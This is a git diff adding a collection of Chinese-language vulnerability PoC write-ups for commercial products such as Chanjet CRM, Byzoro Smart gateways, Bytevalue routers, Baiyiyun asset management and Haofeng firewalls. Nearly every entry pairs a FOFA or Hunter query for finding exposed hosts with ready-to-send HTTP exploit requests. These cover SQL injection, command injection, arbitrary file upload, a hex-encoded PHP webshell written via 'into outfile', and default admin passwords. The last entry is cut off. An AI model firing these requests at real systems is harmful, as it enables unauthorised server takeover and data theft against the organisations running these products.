diff --git a/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md b/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md
new file mode 100644
index 0000000..859a666
--- /dev/null
+++ b/畅捷通CRM系统newleadset.php接口存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 畅捷通CRM系统newleadset.php接口存在SQL注入漏洞
+
+用友畅捷CRM newleadset.php 处存在SQL注入漏洞 ，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```java
+app="畅捷通-畅捷CRM"
+```
+
+## poc
+
+```javascript
+GET /lead/newleadset.php?gblOrgID=1+AND+(SELECT+5244+FROM+(SELECT(SLEEP(5)))HAjH)--+-&DontCheckLogin=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+```
+
+![img](https://i-blog.csdnimg.cn/direct/7ad8cbe1115b4e718331016152dc26ee.png)
\ No newline at end of file
diff --git a/百为智能流控路由器存在命令执行漏洞.md b/百为智能流控路由器存在命令执行漏洞.md
new file mode 100644
index 0000000..2f1f6fa
--- /dev/null
+++ b/百为智能流控路由器存在命令执行漏洞.md
@@ -0,0 +1,27 @@
+# 百为智能流控路由器存在命令执行漏洞
+
+# 一、漏洞简介
+百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令，写入后门，获取服务器权限，从而获取路由器权限。
+
+# 二、影响版本
++ 百为智能流控路由器
+
+# 三、资产测绘
++ hunter`app.name=="BYTEVALUE 百为流控 Router"`
++ 特征
+
+![1700147076639-85e36dbb-4503-4fdf-858e-89f5a189d32e.png](./img/GCwyGnZtM0ZUPa42/1700147076639-85e36dbb-4503-4fdf-858e-89f5a189d32e-995996.png)
+
+# 四、漏洞复现
+```plain
+/goform/webRead/open/?path=|ip addr
+```
+
+![1700147106226-ff23fa04-e5ee-4cd1-8509-e02d77fcc6f2.png](./img/GCwyGnZtM0ZUPa42/1700147106226-ff23fa04-e5ee-4cd1-8509-e02d77fcc6f2-499887.png)
+
+![1700147133055-a0fdb659-bf46-4dc4-88f0-3eaf2a5e9be4.png](./img/GCwyGnZtM0ZUPa42/1700147133055-a0fdb659-bf46-4dc4-88f0-3eaf2a5e9be4-956103.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ig5lw85h3w0ygdfh>
\ No newline at end of file
diff --git a/百卓SmartSQL命令注入漏洞.md b/百卓SmartSQL命令注入漏洞.md
new file mode 100644
index 0000000..d2868cc
--- /dev/null
+++ b/百卓SmartSQL命令注入漏洞.md
@@ -0,0 +1,63 @@
+# 百卓Smart SQL命令注入漏洞
+
+# 一、漏洞简介
+百卓Smart是一种系列品牌上网行为管理设备，多种应用功能集于一身，包括网络应用封堵、流量控制、链路负载均衡、网页分类阻断、上网内容审计、防火墙、VPN等。该网关的管理组件文件 importhtml.php 的功能处理逻辑，对参数 sql 的传参处过滤不严，导致任意SQL语句的执行，造成任意恶意文件的写入。
+
+# 二、影响版本
++ 百卓Smart
+
+# 三、资产测绘
++ fofa`app="byzoro-Smart"`
++ 特征
+
+![1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d.png](./img/UARv6UDd29RgBiDC/1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d-383312.png)
+
+# 四、漏洞复现
+```plain
+GET /importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvcy5waHAn HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1699974989232-16965ee9-3c76-45b9-b1a7-a6271b782b62.png](./img/UARv6UDd29RgBiDC/1699974989232-16965ee9-3c76-45b9-b1a7-a6271b782b62-882594.png)
+
+写入文件位置
+
+```plain
+POST /app/s.php HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+cmd=ifconfig
+```
+
+![1699975045857-a4180062-f99a-4442-a005-33f9f287cbd1.png](./img/UARv6UDd29RgBiDC/1699975045857-a4180062-f99a-4442-a005-33f9f287cbd1-056909.png)
+
+其中`c2VsZWN0IDB4M2MzZjcwNjg3MDIwNjU2MzY4NmYyMDczNzk3Mzc0NjU2ZDI4MjQ1ZjUwNGY1MzU0NWIyMjYzNmQ2NDIyNWQyOTNiM2YzZSBpbnRvIG91dGZpbGUgJy91c3IvaGRkb2NzL25zZy9hcHAvcy5waHAn`为以下代码的base64编码
+
+```plain
+select 0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e into outfile '/usr/hddocs/nsg/app/s.php'
+```
+
+`0x3c3f706870206563686f2073797374656d28245f504f53545b22636d64225d293b3f3e`为webshell hex编码
+
+hex解密网站`[https://www.bejson.com/convert/ox2str/](https://www.bejson.com/convert/ox2str/)`
+
+![1699975206003-6cf67767-eca7-44c5-bd9f-ff1a092eb766.png](./img/UARv6UDd29RgBiDC/1699975206003-6cf67767-eca7-44c5-bd9f-ff1a092eb766-896376.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gigpdn7864aou7y4>
\ No newline at end of file
diff --git a/百卓Smartuploadfile存在任意文件上传漏洞.md b/百卓Smartuploadfile存在任意文件上传漏洞.md
new file mode 100644
index 0000000..4ce0332
--- /dev/null
+++ b/百卓Smartuploadfile存在任意文件上传漏洞.md
@@ -0,0 +1,55 @@
+# 百卓Smart uploadfile存在任意文件上传漏洞
+
+# 一、漏洞简介
+百卓Smart是一种系列品牌上网行为管理设备，多种应用功能集于一身，包括网络应用封堵、流量控制、链路负载均衡、网页分类阻断、上网内容审计、防火墙、VPN等。百卓Smart uploadfile存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。
+
+# 二、影响版本
++ 百卓Smart
+
+# 三、资产测绘
++ fofa`app="byzoro-Smart"`
++ 特征
+
+![1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d.png](./img/5UAaScfollaesr-W/1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d-768626.png)
+
+# 四、漏洞复现
+```plain
+POST /Tool/uploadfile.php? HTTP/1.1
+Host: 
+Cookie: PHPSESSID=942c6029711a902ca974ac33efcdb383
+Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
+Content-Length: 409
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+
+-----------------------------13979701222747646634037182887
+Content-Disposition: form-data; name="file_upload"; filename="contents.php"
+Content-Type: application/octet-stream
+
+<?php echo '<p>Hello World</p>'; ?>
+-----------------------------13979701222747646634037182887
+Content-Disposition: form-data; name="txt_path"
+
+/home/helloworld.php
+-----------------------------13979701222747646634037182887--
+```
+
+![1708149333069-c16f5827-752d-439f-a499-b0552a57e972.png](./img/5UAaScfollaesr-W/1708149333069-c16f5827-752d-439f-a499-b0552a57e972-291266.png)
+
+上传文件位置
+
+```plain
+/home/helloworld.php
+```
+
+![1708149358116-a65b5f1f-09ce-4959-bb49-51efe0944746.png](./img/5UAaScfollaesr-W/1708149358116-a65b5f1f-09ce-4959-bb49-51efe0944746-674187.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bpwixrcymsyfg62k>
\ No newline at end of file
diff --git a/百卓Smart后台任意文件上传漏洞.md b/百卓Smart后台任意文件上传漏洞.md
new file mode 100644
index 0000000..f10d4a6
--- /dev/null
+++ b/百卓Smart后台任意文件上传漏洞.md
@@ -0,0 +1,72 @@
+# 百卓Smart后台任意文件上传漏洞
+
+# 一、漏洞简介
+百卓Smart是一种系列品牌上网行为管理设备，多种应用功能集于一身，包括网络应用封堵、流量控制、链路负载均衡、网页分类阻断、上网内容审计、防火墙、VPN等。该网关后台存在任意文件上传漏洞，攻击者可通过该漏洞获取服务器控制权限。
+
+# 二、影响版本
++ 百卓Smart
+
+# 三、资产测绘
++ fofa`app="byzoro-Smart"`
++ 特征
+
+![1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d.png](./img/KzgUSQ8c-_hpC3fM/1699974927531-d5f2d49c-f9c3-417f-abc7-7bbcaba6f53d-084613.png)
+
+# 四、漏洞复现
+1. 使用默认账号`admin/admin`登录后台，获取登录后的`cookie`
+
+![1699975787899-0d8a4ef8-3b73-4d82-b3fe-b8d38c7e9b52.png](./img/KzgUSQ8c-_hpC3fM/1699975787899-0d8a4ef8-3b73-4d82-b3fe-b8d38c7e9b52-981218.png)
+
+2. 使用上一步获取的cookie替换上传webshell
+
+```plain
+POST /useratte/web.php? HTTP/1.1
+Host: xx.xx.xx.xx
+Cookie: PHPSESSID=6fca23a63591d8742708a4c50308f150
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
+Content-Length: 611
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: same-origin
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+
+-----------------------------42328904123665875270630079328
+Content-Disposition: form-data; name="file_upload"; filename="2.php"
+Content-Type: application/octet-stream
+
+<?php phpinfo(); ?>
+-----------------------------42328904123665875270630079328
+Content-Disposition: form-data; name="id_type"
+
+1
+-----------------------------42328904123665875270630079328
+Content-Disposition: form-data; name="1_ck"
+
+1_radhttp
+-----------------------------42328904123665875270630079328
+Content-Disposition: form-data; name="mode"
+
+import
+-----------------------------42328904123665875270630079328
+```
+
+![1699975835584-e542cf6b-0f16-4851-a019-0693c1a35825.png](./img/KzgUSQ8c-_hpC3fM/1699975835584-e542cf6b-0f16-4851-a019-0693c1a35825-685758.png)
+
+3. 上传文件位置
+
+```plain
+/upload/2.php
+```
+
+![1699975873888-77ee6853-8e05-490e-bc05-d2f80b95be6e.png](./img/KzgUSQ8c-_hpC3fM/1699975873888-77ee6853-8e05-490e-bc05-d2f80b95be6e-062968.png)
+
+
+
+> 更新: 2024-02-29 23:57:13  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/znskqftupnfub0ea>
\ No newline at end of file
diff --git a/百择唯·供应链RankingGoodsList2存在SQL注入漏洞.md b/百择唯·供应链RankingGoodsList2存在SQL注入漏洞.md
new file mode 100644
index 0000000..b0cf375
--- /dev/null
+++ b/百择唯·供应链RankingGoodsList2存在SQL注入漏洞.md
@@ -0,0 +1,33 @@
+# 百择唯·供应链 RankingGoodsList2存在SQL注入漏洞
+
+# 一、漏洞简介
+懂微科技是一家专注于办公服务行业电商解决方案的提供商，致力于为办公服务行业赋能、提升效率和核心竞争力。百择唯·供应链作为懂微科技的重要产品之一，旨在通过数字化手段优化办公服务行业的供应链管理,提升采购效率，降低采购成本，增强企业的盈利能力。适用于各种需要优化供应链管理、提升采购效率的企业。同时，通过与合作伙伴的共享共建，构建完善的供应链生态体系，提升整体运营效率和市场竞争力。百择唯·供应链 RankingGoodsList2存在SQL注入漏洞
+
+# 二、影响版本
++ 百择唯·供应链
+
+# 三、资产测绘
++ fofa`body="/Content/Css/_SiteCss/"`
++ 特征
+
+![1732022759477-c1a2bd70-04f5-44bd-bc33-ca5624510b7b.png](./img/jlgM_sWCTSTwqCWx/1732022759477-c1a2bd70-04f5-44bd-bc33-ca5624510b7b-956370.png)
+
+# 四、漏洞复现
+```java
+POST /Goods/RankingGoodsList2 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+ 
+goodsSortType=Recommend&goodsTypeList%5B%5D=1%';WAITFOR DELAY '0:0:5'--
+```
+
+![1732022907643-8a0884e7-7a63-4742-ac74-576dd5c7e13c.png](./img/jlgM_sWCTSTwqCWx/1732022907643-8a0884e7-7a63-4742-ac74-576dd5c7e13c-370161.png)
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gqpnlboq0dt6c1f1>
\ No newline at end of file
diff --git a/百择唯供应链存在RankingGoodsList2存在SQL注入漏洞.md b/百择唯供应链存在RankingGoodsList2存在SQL注入漏洞.md
new file mode 100644
index 0000000..ce1cb50
--- /dev/null
+++ b/百择唯供应链存在RankingGoodsList2存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# 百择唯供应链存在RankingGoodsList2存在SQL注入漏洞
+
+百择唯供应链存在RankingGoodsList2 SQL注入漏洞，未经身份验证的攻击者通过漏洞，执行任意代码从而获取到服务器权限。
+
+## fofa
+
+```javascript
+body="/Content/Css/_SiteCss/"
+```
+
+## poc
+
+```javascript
+POST /Goods/RankingGoodsList2 HTTP/1.1
+Host: 
+Content-Length: 99
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+
+goodsTypeList%5B%5D=090501&goodsSortType=Recommend&ColumnName=%E5%90%8C%E7%B1%BB%E6%8E%A8%E8%8D%90
+```
+
+![ddd1da3ecfceda9da7b026bffc218972](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411211145704.png)
diff --git a/百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞.md b/百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞.md
new file mode 100644
index 0000000..d1e4b3b
--- /dev/null
+++ b/百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# 百择唯供应链存在ReadAfterSaleList存在SQL注入漏洞
+
+百择唯供应链存在ReadAfterSaleList SQL注入漏洞，未经身份验证的攻击者通过漏洞，执行任意代码从而获取到服务器权限。
+
+## fofa
+
+```javascript
+body="/Content/Css/_SiteCss/"
+```
+
+## poc
+
+```javascript
+POST /AfterSale/ReadAfterSaleList HTTP/1.1
+Host: 
+Content-Length: 106
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: 你的Cookie
+Connection: keep-alive
+
+time=%E8%BF%91%E4%B8%80%E5%91%A8%E8%AE%A2%E5%8D%95&state=%E5%B7%B2%E7%AD%BE%E6%94%B6&key='&index=1&rows=10
+```
+
diff --git a/百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md b/百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md
new file mode 100644
index 0000000..2739e7c
--- /dev/null
+++ b/百择唯供应链存在SearchOrderByParams存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# 百择唯供应链存在SearchOrderByParams存在SQL注入漏洞
+
+百择唯供应链存在SearchOrderByParams SQL注入漏洞，未经身份验证的攻击者通过漏洞，执行任意代码从而获取到服务器权限。
+
+## fofa
+
+```javascript
+body="/Content/Css/_SiteCss/"
+```
+
+## poc
+
+```javascript
+POST /M/SearchOrderByParams HTTP/1.1
+Host:
+Content-Length: 17
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
+Accept: */*
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
+Cookie: 你的Cookie
+Connection: keep-alive
+
+Key=&SearchType=1
+```
+
diff --git a/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md b/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..1bbcfd1
--- /dev/null
+++ b/百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 百易云资产管理系统admin.ticket.close.php存在SQL注入漏洞
+
+百易云资产管理系统在admin.ticket.close.php接口下存在sql注入漏洞
+
+## fofa
+
+```javascript
+body="不要着急，点此"
+```
+
+## poc
+
+```javascript
+GET /wuser/admin.ticket.close.php?ticket_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(2)))OKTO) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:50.0)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+
+
+```
diff --git a/百易云资产管理运营系统house.save.php存在SQL注入漏洞.md b/百易云资产管理运营系统house.save.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..732745f
--- /dev/null
+++ b/百易云资产管理运营系统house.save.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 百易云资产管理运营系统house.save.php存在SQL注入漏洞
+
+百易云资产管理运营系统 house.save.php 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+body="不要着急，点此"
+```
+
+## poc
+
+```javascript
+GET /adminx/house.save.php?project_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(5)))OKTO) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409111003864.png)
\ No newline at end of file
diff --git a/百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞.md b/百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..8a9759d
--- /dev/null
+++ b/百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞
+
+百易云资产管理运营系统ticket.edit.php存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+body="不要着急，点此"
+```
+
+## poc
+
+```javascript
+GET /adminx/ticket.edit.php?project_id=1%20AND%20(SELECT%206941%20FROM%20(SELECT(SLEEP(5)))OKTO) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![image-20240923093436135](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409230934196.png)
\ No newline at end of file
diff --git a/百易云资产管理运营系统ufile.api.php存在SQL注入漏洞.md b/百易云资产管理运营系统ufile.api.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..fcf75f0
--- /dev/null
+++ b/百易云资产管理运营系统ufile.api.php存在SQL注入漏洞.md
@@ -0,0 +1,25 @@
+# 百易云资产管理运营系统ufile.api.php存在SQL注入漏洞
+
+百易云资产管理运营系统ufile.api.php存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+body="不要着急，点此"
+```
+
+## poc
+
+```javascript
+GET /api/file/ufile.api.php?act=filedel&fid=1%20AND%20(SELECT%207357%20FROM%20(SELECT(SLEEP(2)))UPCw) HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.1
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate, br
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+Priority: u=0, i
+```
+
+![](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410231039295.png)
\ No newline at end of file
diff --git a/皓峰防火墙login.php存在SQL注入漏洞.md b/皓峰防火墙login.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..e3614e0
--- /dev/null
+++ b/皓峰防火墙login.php存在SQL注入漏洞.md
@@ -0,0 +1,54 @@
+# 皓峰防火墙login.php存在SQL注入漏洞
+
+# 一、漏洞简介
+深圳市皓峰通讯技术有限公司成立于2004年，位于深圳市高新技术产业园，是经过国家认定的“双软”企业和“国家高新技术企业”。佑友防火墙login存在SQL注入漏洞
+
+# 二、影响版本
++ 佑友防火墙
+
+# 三、资产测绘
+```plain
+fofa：title="佑友防火墙"
+```
+
+![1716109175546-e972b21a-f4d3-4a0f-9677-9e95504a96b0.png](./img/8iZtJsEL5UgBow79/1716109175546-e972b21a-f4d3-4a0f-9677-9e95504a96b0-834190.png)
+
+# 四、漏洞复现
+```plain
+POST /login.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=qc13eucchtnbr161lnca4ibde1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Length: 67
+
+action=login&username=dadsa' AND (SELECT 6357 FROM (SELECT(SLEEP(5)))DIFt) AND 'lKDb'='lKDb&password=dada&submit=%E7%99%BB%E5%BD%95
+```
+
+![1716109122397-82220e26-ce75-436b-ae2a-531cd0cae6de.png](./img/8iZtJsEL5UgBow79/1716109122397-82220e26-ce75-436b-ae2a-531cd0cae6de-861886.png)
+
+```plain
+POST /login.php HTTP/1.1
+Host: 
+Cookie: PHPSESSID=qc13eucchtnbr161lnca4ibde1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Content-Length: 67
+
+action=login&username=dadsa&password=dada&submit=%E7%99%BB%E5%BD%95
+```
+
+![1716109058542-6ed430c0-630c-49a2-9985-77465eb6ef21.png](./img/8iZtJsEL5UgBow79/1716109058542-6ed430c0-630c-49a2-9985-77465eb6ef21-481519.png)
+
+
+
+> 更新: 2024-05-20 22:23:58  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/eavau8fm2o7mcft9>
\ No newline at end of file
diff --git a/皓峰防火墙setdomain存在信息泄露漏洞.md b/皓峰防火墙setdomain存在信息泄露漏洞.md
new file mode 100644
index 0000000..631bf60
--- /dev/null
+++ b/皓峰防火墙setdomain存在信息泄露漏洞.md
@@ -0,0 +1,28 @@
+# 皓峰防火墙setdomain存在信息泄露漏洞
+
+# 一、漏洞简介
+深圳市皓峰通讯技术有限公司成立于2004年，位于深圳市高新技术产业园，是经过国家认定的“双软”企业和“国家高新技术企业”。皓峰防火墙系统存在信息泄露漏洞，攻击者可利用该漏洞获取敏感信息。
+
+# 二、影响版本
++ 佑友防火墙
+
+# 三、资产测绘
+```plain
+fofa：title="佑友防火墙"
+```
+
+![1716109179632-2019ee30-a9a4-4e0a-ae2d-bce9bd9d6d2f.png](./img/pZakr3fj83f4UEn3/1716109179632-2019ee30-a9a4-4e0a-ae2d-bce9bd9d6d2f-022177.png)
+
+# 四、漏洞复现
+```plain
+/setdomain.php
+```
+
+![1716107923587-1798acc2-e923-4285-a7b9-9df39a3c19a8.png](./img/pZakr3fj83f4UEn3/1716107923587-1798acc2-e923-4285-a7b9-9df39a3c19a8-851228.png)
+
+![1716107933589-7bcf6a84-4cfc-480b-bf05-36aa2c6fa0d7.png](./img/pZakr3fj83f4UEn3/1716107933589-7bcf6a84-4cfc-480b-bf05-36aa2c6fa0d7-342483.png)
+
+
+
+> 更新: 2024-05-20 22:24:02  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ccv63zl63aohrxg2>
\ No newline at end of file
diff --git a/皓峰防火墙存在弱口令漏洞.md b/皓峰防火墙存在弱口令漏洞.md
new file mode 100644
index 0000000..e0bcd93
--- /dev/null
+++ b/皓峰防火墙存在弱口令漏洞.md
@@ -0,0 +1,29 @@
+# 皓峰防火墙存在弱口令漏洞
+
+# 一、漏洞简介
+深圳市皓峰通讯技术有限公司成立于2004年，位于深圳市高新技术产业园，是经过国家认定的“双软”企业和“国家高新技术企业”。佑友防火墙存在弱口令漏洞
+
+# 二、影响版本
++ 佑友防火墙
+
+# 三、资产测绘
+```plain
+fofa：title="佑友防火墙"
+```
+
+![1716109171548-60a18d8a-252e-4667-bdfd-469a65d1ad46.png](./img/IXIaCzxNCoUKBCcL/1716109171548-60a18d8a-252e-4667-bdfd-469a65d1ad46-789971.png)
+
+# 四、漏洞复现
+```plain
+admin/0000
+superadmin/888888
+```
+
+![1716108465436-0536c9d9-b1da-4fa9-912a-f3b8c491c6b2.png](./img/IXIaCzxNCoUKBCcL/1716108465436-0536c9d9-b1da-4fa9-912a-f3b8c491c6b2-655449.png)
+
+![1716108493662-d793852e-9184-4690-ac4e-aba6f3884f98.png](./img/IXIaCzxNCoUKBCcL/1716108493662-d793852e-9184-4690-ac4e-aba6f3884f98-909975.png)
+
+
+
+> 更新: 2024-05-20 22:24:10  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/srt04f8iyohtd4b5>
\ No newline at end of file
diff --git a/盲盒抽奖小程序系统存在任意文件读取漏洞.md b/盲盒抽奖小程序系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..98929f1
--- /dev/null
+++ b/盲盒抽奖小程序系统存在任意文件读取漏洞.md
@@ -0,0 +1,45 @@
+# 盲盒抽奖小程序系统存在任意文件读取漏洞
+
+# 一、漏洞简介
+盲盒抽奖小程序系统存在任意文件读取漏洞
+
+# 二、影响版本
++ 盲盒抽奖小程序系统
+
+# 三、资产测绘
++ fofa
+
+```plain
+"vendor/owl.carousel2/assets/owl.carousel.css" && "img/arrow-left.png"
+```
+
++ 特征
+
